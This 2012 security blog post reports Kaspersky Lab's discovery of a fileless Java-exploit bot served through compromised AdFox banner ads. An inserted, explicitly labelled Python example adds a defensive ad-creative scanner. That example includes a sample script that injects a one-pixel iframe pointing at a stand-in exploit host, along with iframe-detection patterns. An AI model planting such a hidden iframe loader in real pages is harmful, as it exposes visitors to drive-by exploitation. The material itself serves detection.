Thursday, March 22, 2012

Java-Based 'Fileless' Malware Served via Compromised Site Ads

What’s more annoying than advertisements on a website?

Answer: Advertisements that infect your computer with “fileless” malware that’s completely capable of dodging the watchful eye of your antivirus software.

Kaspersky Lab discovered that advertisements served through the third-party ad network AdFox contained malicious JavaScript code that loaded an iframe containing an exploit for a known Java vulnerability (CVE-2011-3544).

Typically a Trojan dropper or downloader would be saved to the hard drive during the infection process; this attack sets itself apart from the norm by injecting an encrypted dynamic link library (DLL) directly into a running Java process instead.

Therefore, the malware is active only in memory and is operational as long as the computer is not restarted – not that it’s a problem considering there’s a good chance that the user will revisit the infected site anyway.

Following a successful infection (which doesn't require any action on the user's part), the ‘fileless’ malware will begin operating as a bot: transmitting the user’s browsing history and a range of other technical information to a command and control server and attempting to disable UAC (User Account Control) in order to download and install Trojan-Spy.Win32.Lurk (“Lurk”) onto the system.

Fileless Malware Payload

During its investigation, Kaspersky Lab contacted AdFox, which found that the offending advertisement was the result of a cybercriminal using an AdFox customer’s account to modify the code of news headline banners to include the malicious code. The bad code has been removed and all is well again.
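One defensive check this story suggests for an ad network or a site that embeds third-party banners, as an added example that is not from the article, AdFox or Kaspersky Lab: a heuristic scan of a creative's markup that flags iframes pointing off the network's own hosts, hidden or one-pixel iframes, and inline scripts that build an iframe at runtime (the pattern described above). The allowlisted hosts, the `.test`/`.invalid` URLs and the two sample creatives are constructed for this example.

```python
import re
from html.parser import HTMLParser

# Hosts the ad network legitimately serves from (constructed for this example).
ALLOWED_HOSTS = {"ads.example-network.test", "cdn.example-network.test"}
# Inline-script patterns that build an iframe at runtime instead of declaring one in markup.
INJECTS_IFRAME = re.compile(r"createElement\s*\(\s*['\"]iframe['\"]\s*\)|document\.write\s*\([^)]*<iframe", re.I)

class CreativeScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._script = None  # buffer for the <script> body currently being read

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            m = re.match(r"^[a-z][a-z0-9+.-]*://([^/?#]+)", a.get("src", "").strip(), re.I)
            host = m.group(1).lower() if m else ""  # '' for relative or empty src
            if host and host not in ALLOWED_HOSTS:
                self.findings.append("iframe to non-network host " + host)
            style = a.get("style", "").replace(" ", "").lower()
            tiny = any(a.get(k, "").rstrip("px") in ("0", "1") for k in ("width", "height"))  # 0/1-pixel frame
            if tiny or "display:none" in style or "visibility:hidden" in style:
                self.findings.append("hidden or zero-size iframe")
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body, self._script = "".join(self._script), None
            if INJECTS_IFRAME.search(body):
                self.findings.append("inline script injects an iframe at runtime")

def scan_creative(html):
    """Return the findings for one banner's markup; an empty list means nothing was flagged."""
    p = CreativeScanner()
    p.feed(html)
    p.close()
    return p.findings

# Constructed samples: a clean headline banner, and the same banner with loader code appended.
CLEAN = ('<a href="https://news.example.test/story"><img src="https://cdn.example-network.test/'
         'b.png" width="468" height="60"></a>')
TAMPERED = CLEAN + ('<script>var f=document.createElement("iframe");f.src="http://exploit-host'
                    '.invalid/";f.width=1;f.height=1;document.body.appendChild(f);</script>')
```

Run `scan_creative(TAMPERED)` to see the injected loader flagged while `scan_creative(CLEAN)` returns nothing; the host allowlist and size thresholds are the knobs to tune for a real network.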

While this particular attack was targeting Russian users, it’s entirely possible for the very same exploit and corresponding fileless bot to be used to target users in other countries.

For the record, the Java vulnerability exploited in this attack was patched in October 2011 and yet it was still successful. So, make sure you keep all third-party software installed on your machine fully patched and up-to-date!
